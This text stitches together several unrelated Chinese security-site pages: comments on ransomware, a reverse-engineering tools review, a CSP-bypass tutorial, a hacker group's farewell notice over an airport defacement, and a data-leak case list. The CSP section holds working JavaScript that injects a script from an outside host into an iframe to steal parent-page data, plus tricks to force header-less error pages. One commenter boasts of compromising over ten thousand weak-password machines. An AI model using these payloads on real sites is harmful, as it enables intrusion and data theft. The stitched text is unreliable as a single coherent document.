大一的时候才知道勒索病毒的危害真的很厉害,那时候还有好多高校也中了勒索病毒,本校管理员是我老大哥,晚上折腾一夜给学校架防护打补丁关端口修改密码!管理员疏忽会直接影响公司学校的安全,弱口令密码也是醉了,太水太水!安全意识不可忽视!

我不是黑客 · 2018-11-09 17:00:47 回复
说实在的很多单位的管理人员都水的很,这一年,80%勒索病毒的传播都是通过弱口令进行传播的;上部分是由于管理人员的原因没有更新补丁,还哟部分是网站存在漏洞引起的。

Anonymous · 2018-11-09 17:23:10 回复
没错,我上个月搞了一万多个弱口令机器,太多了

大表姐 · 2018-11-09 15:42:07 回复
呵呵呵呵呵呵呵

绿萝花开 · 2018-11-08 19:49:37 回复
总有人中了勒索软件之后才到处问,哎呀中了啥啥啥勒索软件怎么办啊,在此诚恳的提醒一句,通常情况下最新版本的勒索软件都是无解的。另外,很多时候就算你给了赎金,也还是无法拿回数据,反而会让犯罪分子惦记上:唉呀这人好说话,下次还搞他,跟着他,有肉吃。所以安全上的投入其实是必要的成本,尤其是对于大公司的业务而言。做好防护永远比事后补救更为靠谱。PS:零食大礼包我来了,哦不对,是精选图书我来了

北斗制导 · 2018-11-08 19:34:17 回复
勒索病毒并不是9、10月份才出现的新产物,同样,弱口令问题的存在也是老生常谈。没有攻不破的防御,然是如果因为不良习惯让对方轻易得手,讲真个人觉得很low。服务器方面,做好边界安全,内部规避弱口令问题,加强安全培训,能很大程度减少被攻击成功的概率。而个人电脑方面,如果一定要测试某些破解的软件,虚拟机可以一定程度帮你规避风险(但并不是100%)。最后针对弱口令分享一句话:普通人的弱口令是在拿自己的信息安全开玩笑,管理员的弱口令是在拿未来的自由开玩笑。

阿诚 · 2018-11-07 23:16:46 回复
对方爆破狠疯狂,甚至毫无理性的操作(让人感到害怕)幸好我安装了360安全卫士,保我装B平安,从此再也不怕被勒索了~

360安全卫士
360安全卫士安全客官方账号
文章
203
粉丝
27
TA的文章
盗号木马疯狂窃取游戏币,竟还利用搜索引擎打广告?
2019-02-21 17:27:44
2018年Windows服务器挖矿木马总结报告
2019-02-09 15:30:44
大吉大利放心吃鸡:盗取Steam游戏密码的最新木马披露
2019-02-02 21:02:36
鑫哥木马劫持超60家网吧及9所大学的电脑
2019-01-25 17:53:50
警惕GarrantyDecrypt勒索病毒最新变种NOSTRO加密全部文件
2019-01-16 18:40:37
输入关键字搜索内容
相关文章
事件分析 | Linux watchdogs 感染性隐藏挖矿病毒入侵还原录
预警 | 部分云上用户中招 watchdogs 感染性挖矿病毒
Pony Loader窃密木马样本分析
盗号木马疯狂窃取游戏币,竟还利用搜索引擎打广告?
Lucky双平台勒索者解密分析
Criakl勒索病毒分析简要
1月政企终端安全态势分析报告
热门推荐
文章目录
感染数据分析
勒索病毒最新情报
黑客信息
防护数据
总结
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright ? 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

宿主化

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
【技术分享】逆向工具综述(下)
阅读量 57775 | 稿费 200

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2016-12-19 18:04:32
译文声明
本文是翻译文章,文章原作者,文章来源:pelock.com
原文地址:https://www.pelock.com/articles/reverse-engineering-tools-review

译文仅供参考,具体内容表达以及含义原文为准

×

http://p2.qhimg.com/t01225876f24b7b7bc7.png

翻译:overXsky

预估稿费:200RMB(不服你也来投稿啊!)

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

传送门:【逆向工具综述(上)】

类别4:十六进制编辑器

如果你已经在反汇编器中进行了软件分析,并用调试器跟踪了它的运行,此时就会需要对程序代码进行一定的干预来更正或修改一些文本字符串、修改值或其他包含在软件中的二进制形式的信息。

此时十六进制编辑器就派上用场了。过去有段时间我习惯于阅读游戏杂志Top Secret,我只是将十六进制编辑器和保存游戏的修改这两者联系起来。作为读者我会发送众多的地址偏移量和需要在被保存的文件中修改的值,比如获取一定的游戏金币或者其他游戏中的资源。

软件市场上有许多的带有不同功能的十六进制编辑器,比如内置数据结构(意味着该十六进制编辑器可以使点阵元素或exe文件内部结构可视化)查看功能。一个著名的例子就是WinHex,它常用于数据恢复(它内置了对很多系统文件的支持),但是在我看来它并不适合做一些在软件中“挖掘”的工作,尽管它也能够一定程度地胜任。

HIEW

这是我的首选十六进制编辑器,真是无法想象假如没有它我该如何工作。它看上去很像一款老旧的控制台软件,但其实它是宛如野兽般的存在。HIEW(缩写于Hack’s View)既是一个十六机制编辑器,也是一个反汇编器。它不仅支持x86、x64、ARM V6处理器架构,还支持NE、LE、PE/PE32+、ELF/ELF64文件。这款从1991年就开始开发的软件拥有庞大的用户数据库,并且至今仍保持规律的更新周期。

多亏了HIEW我们不仅能够修改二进制文件数据,而且即使要修改的对象是一个软件也可以修改它的代码。内置的反汇编器允许对代码和函数做定位,也可以让我们在内置的汇编器的帮助下对已经存在的指令做修改。这意味着你不需要知道十六进制的核心代码,恰相反只要能够写入 mov eax,edx 这样的指令就够了,HIEW会自动帮我们把修改后的指令编译好写入二进制文件中。

HIEW还能够像IDA一样反复更换工具,如果我们有一个简单的任务需要做,其最大的优势在于操作速度非常快、内置代码分析和直接修改选项的能力。

http://p9.qhimg.com/t0146289d38b040a09d.png

图16:HIEW十六机制编辑器和反汇编器

http://p8.qhimg.com/t01cc9ea05220cfb41f.png

Hex Workshop

Windows 上有许多有用的选项的十六进制编辑器,比如文件比对、区块位操作、生成校验和,还能够查看许多流行文件格式的结构。

http://p6.qhimg.com/t01d7b9f2830ba7f513.png

图17:Hex Workshop十六进制编辑器

http://p8.qhimg.com/t019d6cc06b23fb34cf.png

HxD

免费的十六进制编辑器,拥有基本的功能和选项,比如编辑、搜索、文件比对。它支持同时打开多个文件,也可以打开内存中的不同进程以获得对磁盘的直接访问。

http://p0.qhimg.com/t01a35252d67c2c51b9.png

图18:HxD 十六进制编辑器

http://p0.qhimg.com/t019d53556a181e2cea.png

类别5:资源修改器

Windows应用程序的特色是所有像图标、图片、表格、本地化字符串还有其他信息,都被保存在PE文件格式中的一个特殊区块——.rsrc段。这些数据在编译后连接时被保存于其中。由于所有的程序文件都被保存于一个exe或dll输出文件中,在文件大小不变的情况下如果我们需要修改一些信息直接使用十六进制修改器即可,但是当我们需要增添新的数据或者会改变原有文件的大小的时候(比如更长的文本或者另一张图片),我们就需要用到资源修改器。

资源修改器除了能对应用程序资源做修改,也可以让我们整体观察该程序中还包含了什么其他资源。

Resource Hacker FX

Resource Hacker过去曾是最流行的资源修改器,但是它却很久没有再更新过了。不过新的补丁的出现使这款资源修改器得以新生。

http://p0.qhimg.com/t0142ee205035a57f07.png

图19:Resource Hacker FX资源修改器

http://p1.qhimg.com/t01fb444b1725625c33.png

Resource Tuner

Resource Tuner是一款杰出的资源修改器,是PE Explorer作者的又一力作。它包含了内置的脱壳工具,比如UPX和FSG的壳。资源的修改也可以通过友好的操作向导来完成。Resource Tuner具有内置的扫描工具,允许从目录中扫描任何指定类型的资源。

http://p2.qhimg.com/t0182ceca427331e335.png

图20:Resource Tuner资源修改器

http://p5.qhimg.com/t01300f5c040c185318.png

Dependency Walker*

它是一款可以扫描所有32位、64位Windows模块的工具,包括exe, dll, ocx, sys等,并能建立起树形图依赖关系以直观查看。对于每一个模块,他都会列举出该模块中全部的导出函数,而这些导出函数可能会在其他模块中被调用。

Dependency Walker对于排除与加载执行模块相关的系统错误也非常有用。它能够检测出许多常见应用程序错误比如模块丢失、非法模块、导入导出表不匹配等等。

http://p3.qhimg.com/t01950c6393ff00eb97.png

图21:Dependency Walker模块分析界面

http://p4.qhimg.com/t014abc943d4895b0b2.png

类别6:编辑器和支持工具

逆向工程中经常需要为了某个特殊的目的而制定专门的工具,除了标配的反汇编、反编译、调试器等之外,还有许许多多帮助我们分析软件的专门的工具,下面就能看到几款介绍。

PE-Bear

PE-Bear主要包括极佳的浏览界面和文件结构编辑器,内置的简单反汇编器,基于所有结构(可谓是全世界独一无二的解决方案)的PE文件对比,对流行的exe加壳工具/exe保护工具的检测,十六进制编辑和区块结构的可视化图形界面。

http://p8.qhimg.com/t01ae3d95dc0df669da.png

图22:PE-Bear编辑器

http://p8.qhimg.com/t01a541caf2593e5396.png

PeStudio

PeStudio是一个有趣的工具,除了能够展示基本的exe文件信息之外还有一系列可以检测出exe中错误元素(各种异常)的规则,可以潜在地表明该文件是否已经被感染。这对于那些成天接触PE文件的人来说是一个非常有用的工具。

http://p9.qhimg.com/t011e79c6de241df00f.png

图23:PeStudio可执行文件分析工具

http://p2.qhimg.com/t01bd73d8c068381d1d.png

dirtyJOE

主要针对编译过的Java文件。它是一个相当高级的编辑器,是来自波兰的独一无二的工具,可以通过内置的反汇编器和反编译器来修改代码。该程序还允许修改所有已编译过的*.class文件结构。在想要修改受保护的Java代码(已经过Java混淆器的处理)时dirtyJOE就体现出了它的不凡之处,传统的反编译、修改、和重编译方法都已失效的情况下,它证明了什么叫做无可替代。

http://p8.qhimg.com/t015ba787c9dd6e457d.png

图24:dirtyJOE Java文件编辑器

http://p3.qhimg.com/t0133c9c8dbc3502203.png

PEiD*

一款流行的检测加壳、加密方式和编译器类型的工具。体积小巧,分析速度快。提供了多种扫描方式,支持插件扩展功能。能够查看内存中进程调用的模块,还可以查看具体的PE文件格式。

尽管作者已经很久没有更新过了,但是它仍然是当今十分流行的一个查壳查编译器的分析利器。

http://p7.qhimg.com/t019e05af43d47a64a4.png

图25:PEiD查壳分析器

http://p3.qhimg.com/t013c5ee034e2709ce2.png

PEView*

PEView提供了一个直观而又简便的查看PE文件的方式,同时它也支持COFF(Component Object File Format)文件。它能够具体地展示出PE头、区块、目录 、导入表、导出表,以及包含在EXE, DLL, OBJ, LIB, DBG等文件格式中的资源信息。

http://p1.qhimg.com/t01c2f62d58d9eb6bac.png

图26:PEView PE文件格式查看器

http://p9.qhimg.com/t01ef560b8796e9415b.png

类别7:提取器和分离器

应用程序文件就像应用程序软件包一样可以包含额外的信息,像是隐藏的图标、声音文件、库文件等等。如果我们想要快速查阅应用程序或者它的安装包里面包含了什么内容,我们就必须使用一款合适的提取器或者叫分离器。

Universal Extractor

该软件允许从压缩文件、自解压压缩文件和安装包里面提取有用的文件。当我们想要知道安装包里究竟藏了些什么东西而又不想运行安装程序的时候它确实十分有效,其中安装包内经常会包含一些额外的安装脚本或者辅助库。

http://p3.qhimg.com/t01b6f3c88ee64ce878.png

图27:Universal Extractor

http://p7.qhimg.com/t010e1c12f4dda44f22.png

MultiExtractor

能够提取所有类型的多媒体文件,像是图形文件、图标、声音文件、视频、3D模型、Flash动画等。当我们想要快速查看程序中包含了什么文件时,内存进程的动态数据解压和简单的查看器是这款软件的乐趣所在。

http://p3.qhimg.com/t0115e36cec4d52c43b.png

图28:MultiExtractor界面

http://p8.qhimg.com/t0162167f9857c18e4c.png

类别8:虚拟环境

分析未知软件的行为是很危险的,尤其是不得不运行程序的时候。可能我们只是仅仅用调试器打开了它,它却默默地在后台新建了一个线程安装了rootkit或者其他恶意软件。所以应该在一个虚拟机中运行可疑的程序来保护我们免受危害。

VMware

最著名的虚拟机软件。我们可以在任何操作系统下安装运行来避免不必要的风险。

http://p2.qhimg.com/t018c9a46b3d7530ea1.png

图29:VMware Workstation虚拟环境

http://p1.qhimg.com/t0153e66f44e83454fa.png

Sandboxie

这款软件能够为应用程序创建虚拟沙箱环境并在其中运行。所有在沙箱中的操作都是和主机系统隔离的,不会给它带来任何影响。用它来调试软件或快速测试软件的正确性是一个非常好的选择,而无需担心其副作用。

http://p5.qhimg.com/t01b01597250077404d.png

图30:Sandboxie虚拟沙箱

http://p7.qhimg.com/t01429250ca8a7e955a.png

Parallels Desktop *

Parallels字面意思是“平行”,意指操作间的无缝切换,让使用者感觉虚拟机与宿主机是平行工作而非依存关系。尽管这篇文章介绍的全部都是以Windows平台为主的逆向软件(跨平台的如IDA、PE-Bear也算在其列),但仍有必要提一提这款为Mac用户提供无缝衔接操作的Windows虚拟机平台。

它最大的优势就是宿主化模式(unity mode),这点VMware在OSX上做的远远不如Windows好,你可以像打开Mac软件一样打开Windows软件,而不需要在虚拟机和宿主机之间来回切换。而且Parallels的硬件支持和性能功耗也比VMware Fusion和Virtual Box来的小。考虑到Mac的便携性和续航能力,这无疑为Mac平台的逆向分析人员提供了一个很好的选择。

http://p4.qhimg.com/t0156dab3e15b3cb2c6.png

图31:在Mac上用Parallels Desktop运行Windows

http://p3.qhimg.com/t01010c5001c13da6a2.png

这里并不是结束,这里才刚刚开始…

以上所介绍的工具只是应用市场上的一部分而已,还有许多其他免费的或者实验项目以及可能在某个时刻就会被遗弃的、但仍然值得一试的软件。我非常鼓励大家勇于发掘逆向工程的奥秘,如果你有什么有趣的发现,不妨通过以下方式与我取得联系:https://www.pelock.com/contact (这是原文作者的联系方式,也欢迎通过overxsky@foxmail.com与译者取得联系)。

(完)

传送门:【逆向工具综述(上)】

本文翻译自 pelock.com, 原文链接 。如若转载请注明出处。
安全知识

overXsky 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

事件分析 | Linux watchdogs 感染性隐藏挖矿病毒入侵还原录
2019-02-23 19:55:32

WordPress 5.0 RCE 详细分析
2019-02-22 16:45:18

某php开源cms有趣的二次注入
2019-02-22 16:30:08

三层网络靶场搭建&MSF内网渗透
2019-02-22 14:30:46
|发表评论
发表你的评论吧
昵称
男科圣手
换一个
|评论列表
还没有评论呢,快去抢个沙发吧~
overXsky
这个人太懒了,签名都懒得写一个
文章
11
粉丝
0
TA的文章
【技术分享】如何绕过最新微软Edge补丁并继续欺骗地址栏加载恶意警告页面
2017-03-17 16:19:34
【技术分享】CVE-2016-5483:利用mysqldump备份可生成后门
2017-03-10 11:55:43
【木马分析】新版“Locky Bart”勒索软件二进制和后端服务器分析
2017-02-20 16:10:10
【技术分享】攻击Windows平台NVIDIA驱动程序
2017-02-20 09:57:12
【漏洞分析】CVE-2016-9311:NTPD漏洞可以引发拒绝服务
2017-02-06 16:35:22
输入关键字搜索内容
相关文章
360 | 数字货币钱包APP安全威胁概况
以太坊智能合约安全入门了解一下(下)
对恶意勒索软件Samsam多个变种的深入分析
360 | 数字货币钱包安全白皮书
Json Web Token历险记
揪出底层的幽灵:深挖寄生灵Ⅱ
简单五步教你如何绕过安全狗
热门推荐
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright ? 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

csp

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
巧妙地绕过CSP:欺骗CSP执行任意代码
阅读量 85205 | 评论 6 稿费 140

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-07-13 13:00:34
译文声明
本文是翻译文章,文章原作者booom,文章来源:lab.wallarm.com
原文地址:https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa

译文仅供参考,具体内容表达以及含义原文为准

×

前言
内容安全策略(Content Security Policy,CSP)是一种内置的浏览器技术,有助于防止跨站点脚本(XSS)等攻击。它列出并描述了路径和源,浏览器可以从这些路径和源安全地加载资源,这些资源可能包括图像、框架、JavaScricript等。

但是,如果当所有不安全的资源来源都不被允许时,我们仍可以给出一个成功的XSS事件的例子呢?是怎么做到的呢?

当一切正常时,CSP是如何工作的
这里一个常见的使用场景是当CSP指定图片只能从当前域加载时,这意味着所有带有外部域的标记都将被忽略。

CSP策略通常用于阻止不受信任的JS和最小化XSS攻击。

下面是一个允许从本地域(self)加载和执行以下资源的示例:

Content-Security-Policy: default-src ‘self’ ‘unsafe-inline’;
由于安全策略意味着“除非明确允许,否则禁止使用”,因此配置禁止使用任何执行作为字符串传输的代码的函数。例如:eval,setTimeout,setInterval都将被阻止,因为设置了unsafe-eval

来自外部源的任何内容也会被阻止,包括图像、CSS、WebSocket,特别是JS。

要了解它是如何工作的,请查看我特意放入XSS漏洞的这段代码。尝试以这种方式窃取数据而不惊动用户,即不重定向。

欺骗CSP
尽管有这些限制,我们仍然可以上传场景、创建框架和组合图像,因为self并不妨碍使用由SOP(Self Origin Policy)管理的资源。由于CSP也适用于框架,因此相同的策略也适用于可能包含以srcdoc作为协议的数据、blob或文件的框架。

那么,我们真的可以在测试文件中执行任意的javascript吗?

我们要依靠这里的一个整洁的勾子。大多数现代浏览器都会自动将文本文件或图像等文件转换为HTML页面。

这种行为的原因是为了正确地描述浏览器窗口中的内容;它需要有正确的背景、居中等等。不过,iframe也是一个浏览器窗口!因此,在iframe中打开任何需要在浏览器中显示的文件(例如,favicon1.ico or robots.txt),只要内容类型正确,就会立即将它们转换为HTML,而无需进行任何数据验证。

如果一个框架打开了一个没有CSP头的站点页面,会发生什么?你可以猜出答案。没有CSP,一个开放的框架将执行页面内的所有JS。如果页面有XSS漏洞,我们可以自己在框架中编写一个js文件。

为了测试这一点,让我们尝试一个场景,它打开了一个iframe。让我们以我们前面已经提到的Bootstrap.min.css为例。

frame=document.createElement(“iframe”);
frame.src=”/css/bootstrap.min.css”;
document.body.appendChild(frame);

让我们看看框架里有什么。正如预期的那样,CSS被转换成HTML,我们设法覆盖了Head的内容(尽管开头是空的)。现在,让我们看看是否可以让它引入外部JS文件。

script=document.createElement(‘script’);
script.src=’//bo0om.ru/csp.js’;
window.frames[0].document.head.appendChild(script);

成功了!这就是我们如何通过iframe执行注入,创建我们自己的js场景,并查询父窗口以窃取其数据。

XSS攻击只需打开一个iframe,并将其指向任何不包含CSP头的路径。它可以是标准的.ico、robots.txt、sitemap.xml、css/js、jpg或其他文件。

PoC

简单的方法
如果站点开发人员非常谨慎,并且任何预期的站点响应(200-OK)都包含X-Frame-Options: Deny怎么办?我们还可以试着进去。使用CSP的第二个常见错误是在返回Web扫描错误时缺少保护头。最简单的方法就是尝试打开一个不存在的网页。我注意到许多资源只包含200代码响应的X-Frame-Options,而没有404代码的X-Frame-Options。

如果也考虑到了这一点,我们可以尝试让站点返回一个标准的web服务器“invalid request”消息。

例如,强制Nginx返回“400 bad request”,你所需要做的就是查询/./,以防止浏览器对请求进行规范化,并将/./替换为/./,我们将对圆点和最后一个斜杠使用Unicode。

frame=document.createElement(“iframe”);
frame.src=”/%2e%2e%2f”;
document.body.appendChild(frame);

这里的另一种可能是传递和不正确的Unicode路径,即/%或/%z

然而,让Web服务器返回错误的最简单方法是超出URL允许的长度。大多数现代浏览器都可以组合一个url,这个url比web服务器所能处理的时间要长得多。由此类web服务器和nginx&apache处理的标准默认url长度设置为不超过8KB。

为此,我们可以执行路径长度为20000字节的类似场景:

frame=document.createElement(“iframe”);
frame.src=”/”+”A”.repeat(20000);
document.body.appendChild(frame);

另一种欺骗服务器返回错误的方法是触发cookie长度限制。同样,浏览器支持比web服务器能够处理的更多和更长的cookie。按照同样的设想:

创建一个巨大的cookie
for(var i=0;i<5;i++){document.cookie=i+”=”+”a”.repeat(4000)}; 使用任何地址打开iframe,这将导致服务器返回错误(通常没有XFO或CSP) 移除cookie: for(var i=0;i<5;i++){document.cookie=i+”=”} 将自己的js脚本编写到窃取父级数据的框架中 你自己试试吧。下面是一些提示,如果你需要的话:PoC:) 有许多其他方法可以导致Web服务器返回错误,例如,我们可以发送一个很长的POST请求,或者以某种方式导致Web服务器500错误。 为什么CSP如此容易受骗,该怎么办? 简单的根本原因是,控制资源的策略嵌入到资源本身中。 为了避免出现这种情况,我的建议如下: CSP报头应该出现在所有页面上。 应将CSP选项配置为仅限于使用特定资源所必需的权限。尝试设置Content-Security-Policy-Report-Only: default-src ‘none’ ,并逐步为特定用户添加权限规则。 如果必须使用不安全内联来正确加载和处理资源,则唯一的保护是使用none或散列源。否则,你将暴露在XSS攻击中,如果CSP不能保护你,为什么需要它?! 此外,正如@Majorisc所分享的那样,从页面中窃取数据的另一个技巧是使用RTCPeerConnection并通过DNS请求传递数据。不幸的是,default-src ‘self’不能防止它。 审核人:yiwang 编辑:边边 本文翻译自 lab.wallarm.com, 原文链接 。如若转载请注明出处。 Web安全 技术分析 CSP 秋真平 分享到: QQ空间 新浪微博 微信 QQ facebook twitter |推荐阅读 事件分析 | Linux watchdogs 感染性隐藏挖矿病毒入侵还原录 2019-02-23 19:55:32 WordPress 5.0 RCE 详细分析 2019-02-22 16:45:18 某php开源cms有趣的二次注入 2019-02-22 16:30:08 三层网络靶场搭建&MSF内网渗透 2019-02-22 14:30:46 |发表评论 发表你的评论吧 昵称 大表哥 换一个 |评论列表 土司观光团 · 2018-10-23 11:29:57 回复 拥有X-Frame-Options:Deny 的,用长度 绕过 会导致 写入的 的src访问出400错误,这样相当于 只能当成一个反射型xss了啊? 我不是黑客 · 2018-10-23 11:31:22 回复 网站 自动过滤 &ltscrip&gt 我不是黑客 · 2018-10-23 11:31:21 回复 网站 自动过滤 &ltscrip&gt 我不是黑客 · 2018-10-23 11:30:30 回复 两个的 中间 script src 神奇小子 · 2018-07-24 15:36:03 回复 看成scp 微笑炸弹 · 2018-07-13 14:46:55 回复 比我快一步 秋真平 这个人太懒了,签名都懒得写一个 文章 38 粉丝 4 TA的文章 Wemo Insight 智能插座缓冲区溢出漏洞及其利用分析 2018-08-29 10:00:36 如何使用 IDAPython 寻找漏洞 2018-07-18 16:30:45 对暗网黑市廉价RDP销售商店的调查 2018-07-17 15:00:35 巧妙地绕过CSP:欺骗CSP执行任意代码 2018-07-13 13:00:34 对 Smoke Loader 恶意软件新样本进行分析 2018-07-12 16:04:25 输入关键字搜索内容 相关文章 WordPress 5.0 RCE 详细分析 某php开源cms有趣的二次注入 Drupal SA-CORE-2019-003 远程命令执行分析 一篇文章带你深入理解 SQL 盲注 从两道CTF实例看python格式化字符串漏洞 Typora XSS 到 RCE(下) Typora XSS 到 RCE (上) 热门推荐 文章目录 前言 当一切正常时,CSP是如何工作的 欺骗CSP 简单的方法 为什么CSP如此容易受骗,该怎么办? 安全客Logo 安全客 安全客 关于我们 加入我们 联系我们 用户协议 商务合作 合作内容 联系方式 友情链接 内容须知 投稿须知 转载须知 合作单位 安全客 安全客 Copyright ? 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66 Loading...0daybank

1937cn team

1937cn team
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
越南机场被黑事件主角:1937CN Team宣布停止所有活动并关闭网站
阅读量 53136 |

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2016-08-29 10:04:17
https://p5.ssl.qhimg.com/t01f28e80bbd050b65a.png

https://p2.ssl.qhimg.com/t01da8fe3c2f4136a8f.png

1937CN TEAM介绍

1937CN Team。是由民间网络安全爱好者自发组织成立的信息安全领域研究团体,

坚持国家互联网安全的绝对领导是1937CN Team建设的根本规律,以国家互联网安全为己任,招贤纳士,培养精英;积极响应民间网络号召,组织及协 调民间网络安全爱好者的正确路线和行为;分析漏洞,上报病毒,尽可能阻止大的网络危害事件发生;积极响应乌云(白帽子)及CNVD(国家互联网安全漏洞分析平台)的共享,上报安全指引;针对重大网络事件的处理及维护,带动互联网繁荣,打击互联网犯罪活动;举报,清理色情,赌博,邪教,反政等非法垃圾网站。 带动民间互联网安全知识,发扬中国网军精神。

越南机场被黑相关资讯

7月31日:越南机场遭自称中国黑客攻陷 大屏显示:南海是中国的(含视频,8月2日更新)

http://bobao.360.cn/news/detail/3388.html

1937CN停止解析公告

致1937CN全体成员:

时光荏苒,在冷嘲热讽中我们共同走过八年,这八年来,我们从一个青涩的少年逐渐步入中年;

曾梦想仗剑走天涯,看一看世界的繁华,繁华过后激情也随之退却,经历的越多,我们就懂的越多,也逐渐对不忘初心有了更好的诠释。

圈里内斗,域名风波等一系列的事情让我们在迷失中不断的寻找方向,一时忘却了组织成立的

初衷,核心价值观有些许模糊;这段时间在成员的商议和论证后,为了国家的利益,为了网络干净而又安全的环境,我们决定1937CN停止解析,停止一切活动。

曾今只是一种情怀,我们的目标是星辰大海。

也许,下一个战场我们就是战友;一样的国旗,一样的胸章,不同的只是军装而已。

1937CN TEAM 全体核心 敬上

2008.05.06-2016-08.28

本文转载自: 1937CN@越南邻国宰相
如若转载,请注明出处: http://www.1937cn.net/
安全客 – 有思想的安全新媒体
安全资讯

安全客 官方小编 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

事件分析 | Linux watchdogs 感染性隐藏挖矿病毒入侵还原录
2019-02-23 19:55:32

WordPress 5.0 RCE 详细分析
2019-02-22 16:45:18

某php开源cms有趣的二次注入
2019-02-22 16:30:08

三层网络靶场搭建&MSF内网渗透
2019-02-22 14:30:46
|发表评论
发表你的评论吧
昵称
妇科圣手
换一个
|评论列表
还没有评论呢,快去抢个沙发吧~
安全客
有思想的安全新媒体
文章
1137
粉丝
52
TA的文章
安全客 RSAC 2019 专题报道
2019-02-22 14:30:51
从RSA 2019创新沙盒“十强”看网络安全技术动向
2019-02-22 14:27:10
RSAC 2019:最全大会亮点议题抢先揭秘
2019-02-22 10:32:46
关于境内大量家用路由器DNS被篡改情况通报
2019-02-21 13:35:02
GitHub上发布后即登顶的老司机渗透教程,你的小本本备好了吗?
2019-02-20 19:35:06
输入关键字搜索内容
相关文章
2月23日每日安全热点 – 18年成人网站出售账户信息广告增长一倍
从RSA 2019创新沙盒“十强”看网络安全技术动向
2月22日每日安全热点 – Adobe再次为Reader推送补丁以防止重要信息的泄露
2月21日每日安全热点 – WinRAR中存在19年的代码执行漏洞
GitHub上发布后即登顶的老司机渗透教程,你的小本本备好了吗?
“高价收购私人微信号”的局中局
2月20日每日安全热点 – 社工妹子跟踪狂
热门推荐
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright ? 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

泄密案例

泄密案例
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
2018年国内外信息泄露案例汇编
阅读量 184098 |

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2019-02-04 14:40:16

本文作者:补天漏洞响应平台、360安服团队、360安全监测与响应中心、360威胁情报中心、360行业安全研究中心

国内机构重大数据泄露案例
一、 内部威胁
(一) 某地方卫生系统出“内鬼”泄露50多万条新生婴儿和预产孕妇信息

2018年1月,某警方侦破了一起新生婴儿信息倒卖链条。从新学婴儿数据泄露的源头来看:某社区卫生服务中心工作人员徐某,掌握了某市“妇幼信息某管理系统”市级权限账号密码,利用职务之便,多次将2016年至2017年的某市新生婴儿信息及预产信息导出。被抓获前,他累计非法下载新生婴儿数据50余万条,贩卖新生婴儿信息数万余条。

值得注意的是,在该案中,徐某仅是某市某社区卫生服务中心工作人员,却掌握了某市“妇幼信息某管理系统”市级权限账号密码。

从卫生系统“内鬼”徐某到公开出售信息的黄某,多名犯罪嫌疑人层层转手,组成了一条长长的新生婴儿信息倒卖链条。

(二) 某员工私自转让公司权限给朋友,致使30余万条医生数据泄露

2018年2月,某警方侦破了一起医生信息窃取案件。从医生数据泄露的源头来看:武某任职某企业管理咨询(上海)有限公司广州分公司移动医疗顾问一职,拥有公司某应用系统的工作权限,通过其手机二维码可进入系统,内有大量医生信息。出于朋友情面和同情心理,遂把上述权限给了卢谋。

获得权限后,卢某找来“计算机技术很好”的大学舍友温某,卢某指使温某利用该权限通过计算机技术进入应用系统后台,盗取系统内的医生信息。

截至2016年10月11日,被告人卢某、温某等人共窃取系统内的信息共计352962条。一条完整的医生信息包括姓名、手机号码、医院名称、职务及属地等。

庆幸的是,被抓获时,温某尚未把爬取到的医生信息交给卢某。

(三) 合作公司员工泄露防伪数据700万条,某知名酒企损失超百万

2018年2月,某警方侦破了知名酒被仿造的案件。从防伪数据泄露的源头来看:蔡某拿任职于某公司的“XXXX防伪溯源系统”项目专项经理,在2014年4月至2016年9月期间,曾多次利用职务之便通过拍照、直接用U盘拷贝的方式窃取某知名酒企股份有限公司防伪溯源数据,并将窃取出来的数据泄露给蔡某刚。

据法院审理查明,被蔡某拿披露数据量共计700余万条(可制作成700万瓶能够通过防伪溯源验证的假冒酒)。

但随着泄密事件发生,某知名酒企只得向其他公司重新采购防伪密管系统,并将原有防伪标签升级为安全芯片防伪标签,同时废弃前期采购的4.3万余枚防伪标签。据计算,防伪数据库的泄露直接导致该酒企 经济损失约105.7万元。

(四) 某地方公务员利用职务之便,泄露82万条公民信息

2018年3月,某法院审理了某地方公务员窃取信息案件。从公民个人数据泄露的源头来看:朱某任职于某机关单位。从2010年起,朱某利用职务便利,应朋友刘某、王某的要求,超越职权下载了一些公民个人信息,并将这些信息分别提供给他们使用,造成大量的公民个人数据泄露。

经统计,2010年4月至2016年9月,朱某向刘某提供公民个人信息70余万条,2011年11月至2016年7月,朱某向王某提供公民个人信息12余万条。

(五) 某科技公司内鬼窃取500余万条个人信息,并在网上售卖

2018年4月,某警方侦破了一起个人信息兜售案。从数据泄露的源头来看:北京某高校博士毕业马某,利用在科技公司工作的机会,以黑客技术破解公司数据库,非法盗取海量公民个人信息,包括:淘宝信息、金融信息、医疗信息、社保信息、车辆信息等,其中包括居民身份证号、家庭住址、电话号码等隐私。

此后,8人团伙在网上贩卖出售公民信息,数量达500余万条,容量达60G。目前,8名犯罪嫌疑人全部归案。

二、 外部威胁
(一) 某手机厂商称:4万消费者的信用卡数据泄露

2018年1月,某手机厂商发布声明称,4万名消费者的信用卡信息在2017年11月至2018年1月11日期间遭不明黑客盗取。

